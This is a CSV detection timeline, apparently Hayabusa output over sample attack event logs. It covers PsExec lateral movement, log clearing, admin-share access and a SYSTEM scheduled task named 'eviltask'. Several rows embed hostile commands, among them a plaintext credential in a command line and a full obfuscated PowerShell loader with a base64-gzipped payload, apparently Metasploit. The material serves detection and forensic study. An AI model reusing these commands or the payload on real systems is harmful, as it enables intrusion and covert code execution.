747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:18.296 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.15:137 (MSEDGEWIN10.home) | Dst: 10.0.3.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:18.296 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.255:137 () | Dst: 10.0.3.15:137 (MSEDGEWIN10.home) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:20.254 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49926 (MSEDGEWIN10) | Dst: 127.0.0.1:5357 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 09:27:51.181 +00:00,jump01.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 09:27:56.082 +00:00,jump01.offsec.lan,7045,high,,PSExec Lateral Movement,Service: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_LateralMovement-PSEXEC.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 09:27:56.082 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 09:40:32.342 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.343 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.343 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.343 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.347 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.348 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.348 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.360 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.363 +00:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1376020,rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.364 +00:00,srvdefender01.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: PSEXESVC | User: admmig | LID: 0x1376020 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.366 +00:00,srvdefender01.offsec.lan,4688,low,Exec,PsExec Service Start,,rules/sigma/process_creation_builtin/proc_creation_win_psexesvc_start.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.501 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.501 +00:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.510 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.510 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.528 +00:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.528 +00:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.529 +00:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.531 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""cmd.exe"" -u demo\admmig -p Admin1235 -accepteula | Path: C:\Windows\cmd.exe | PID: 0x15d4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.531 +00:00,srvdefender01.offsec.lan,4688,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/process_creation_builtin/proc_creation_win_sysinternals_eula_accepted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:32.567 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:38.463 +00:00,srvdefender01.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:38.463 +00:00,srvdefender01.offsec.lan,4688,medium,Disc,Whoami Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_whoami.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:40:42.263 +00:00,srvdefender01.offsec.lan,4688,low,Disc,Suspicious Execution of Hostname,,rules/sigma/process_creation_builtin/proc_creation_win_susp_hostname.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:41:03.008 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x590 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:41:03.008 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:41:03.023 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:42:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1050 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:42:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:42:03.054 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:43:03.004 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf90 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:43:03.004 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 09:43:03.022 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 13:30:00.569 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\schtasks.exe"" /create /sc minute /mo 1 /tn eviltask /tr C:\tools\shell.cmd /ru SYSTEM | Path: C:\Windows\System32\schtasks.exe | PID: 0x15b4 | User: admmig | LID: 0x6fc89e",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 13:30:00.569 +00:00,srvdefender01.offsec.lan,4688,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation_builtin/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 13:30:00.569 +00:00,srvdefender01.offsec.lan,4688,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_builtin/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 13:30:00.589 +00:00,srvdefender01.offsec.lan,4698,info,,Task Created,"Name: \eviltask | Content: 2021-04-21T13:30:00 OFFSEC\admmig \eviltask PT1M false 2021-04-21T13:30:00 true IgnoreNew true true true false false PT10M PT1H true false true true false false false PT72H 7 C:\tools\shell.cmd S-1-5-18 LeastPrivilege | User: admmig | LID: 0x6fc89e",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 13:30:03.012 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x2ac | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 13:30:03.012 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 13:30:03.029 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx +2021-04-21 14:56:41.780 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:41.786 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:41.818 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx +2021-04-21 14:56:41.818 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:41.818 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx +2021-04-21 14:56:41.897 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.234 +00:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 